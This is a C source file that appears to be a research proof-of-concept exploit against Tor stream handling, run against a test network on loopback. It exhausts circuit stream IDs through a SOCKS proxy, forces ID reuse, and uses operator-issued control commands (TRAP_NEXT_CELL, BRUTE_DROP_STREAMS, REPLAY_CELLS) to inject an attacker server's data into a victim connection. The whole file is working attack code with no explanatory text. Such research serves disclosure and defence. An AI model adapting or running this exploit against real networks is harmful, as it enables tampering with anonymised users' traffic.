#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <poll.h>
#include <err.h>
#include <stdio.h>
#include <assert.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int do_one_connection_prep(uint16_t port) {
  // create socket
  int sock = SYSCHK(socket(AF_INET, SOCK_STREAM, 0));
  struct sockaddr_in proxy_addr = {
    .sin_family = AF_INET,
    .sin_port = htons(9008),
    .sin_addr = htonl(INADDR_LOOPBACK)
  };
  SYSCHK(connect(sock, (struct sockaddr *)&proxy_addr, sizeof(proxy_addr)));

  unsigned char req1[] = {
    0x05 /* VER */,
    0x01 /* NMETHODS */,
    0x00 /* METHODS[0]=NO AUTHENTICATION REQUIRED */
  };
  assert(SYSCHK(write(sock, req1, sizeof(req1))) == sizeof(req1));

  unsigned char auth_reply[2];
  assert(SYSCHK(read(sock, auth_reply, sizeof(auth_reply))) == sizeof(auth_reply));
  assert(auth_reply[0] == 0x05); /* VER */
  assert(auth_reply[1] == 0x00); /* METHOD */

  struct {
    unsigned char bytes[8];
    uint16_t port;
  } __attribute__((packed)) connect_req = {
    .bytes = {
      0x05 /* VER */,
      0x01 /* CMD=CONNECT */,
      0x00 /* RSV */,
      0x01 /* ATYP=IP V4 address */,
      0x7f, 0x00, 0x00, 0x01 /* DST.ADDR=127.0.0.1 */
    },
    .port = htons(port)
  };
  assert(SYSCHK(write(sock, &connect_req, sizeof(connect_req))) == sizeof(connect_req));

  return sock;
}
void do_one_connection_finish_connect(int sock) {
  unsigned char connect_reply[10];
  assert(SYSCHK(read(sock, connect_reply, sizeof(connect_reply))) == sizeof(connect_reply));
  assert(connect_reply[0] == 0x05); /* VER */
  assert(connect_reply[1] == 0x00); /* REP = succeeded */
  assert(connect_reply[2] == 0x00); /* RSV */
  assert(connect_reply[3] == 0x01); /* ATYP = IP V4 address */
}

/* ports that we access through the test Tor network: */
/* no actual server on this port! - we'll fake a reply on this port */
#define VICTIM_SERVER_PORT    1
/*
 * accepts every incoming connection and then does nothing until FIN unless
 * the client sends data to ask the server to close the connection
 */
#define DUMMY_SERVER_PORT     11000
/* server immediately replies with some string and closes the connection */
#define INJECTING_SERVER_PORT 11001

int main(void) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  printf("assuming that the circuit is pristine (no stream IDs allocated yet)!\n");
  printf("consuming most stream IDs...\n");
  int num_short_lived = (0x10000-1) - 2;
  for (int i=0; i < num_short_lived;) {
    printf("\r%d/%d", i, num_short_lived);
    int j;
    int socks[256];
    for (j = 0; j < 256 && i+j < num_short_lived; j++)
      socks[j] = do_one_connection_prep(DUMMY_SERVER_PORT);
    for (j = 0; j < 256 && i+j < num_short_lived; j++) {
      do_one_connection_finish_connect(socks[j]);
      /* this should send END and put the stream in half-open state */
      close(socks[j]);
    }
    i += j;
  }
  printf("\n");
  printf("hopefully there are now 2 consecutive stream IDs remaining\n");

  printf("using and freeing one ID...\n");
  int server_closed_fd = do_one_connection_prep(DUMMY_SERVER_PORT);
  do_one_connection_finish_connect(server_closed_fd);
  if (SYSCHK(write(server_closed_fd, "C", 1)) != 1)
    errx(1, "unable to write close command to server");
  char dummy_char;
  if (SYSCHK(read(server_closed_fd, &dummy_char, 1)) != 0)
    errx(1, "server did not close socket");
  printf("server closed socket, ID was hopefully reused\n");

  printf("please run TRAP_NEXT_CELL control command, then press enter: ");
  getchar();

  printf("opening connection to injecting server...\n");
  int inject_sock = do_one_connection_prep(INJECTING_SERVER_PORT);
  printf("waiting for packet to go out...\n");
  sleep(2);
  /* this should send END and put the stream in half-closed state */
  close(inject_sock);

  printf("resetting next-ID hint...\n");
  int hint_reset_sock = do_one_connection_prep(DUMMY_SERVER_PORT);
  sleep(1);
  close(hint_reset_sock);
  printf("hopefully reset next-ID hint?\n");

  printf(
    "please run BRUTE_DROP_STREAMS control command three times "
    "(with some time in between), then press enter: "
  );
  getchar();

  printf("opening victim connection...\n");
  int victim_sock = do_one_connection_prep(VICTIM_SERVER_PORT);
  printf("waiting for stuff to settle...\n");
  sleep(1);

  printf(
    "please *quickly* run REPLAY_CELLS control command *now* (or after a "
    "few seconds the OP will time out)\n"
  );

  do_one_connection_finish_connect(victim_sock);
  printf("victim_sock apparently connected?\n");
  while (1) {
    char buf[100];
    int read_len = SYSCHK(read(victim_sock, buf, sizeof(buf)-1));
    if (read_len == 0)
      break;
    buf[read_len] = '\0';
    printf("got string: '%s'\n", buf);
  }
  printf("victim connection closed\n");
  return 0;
}
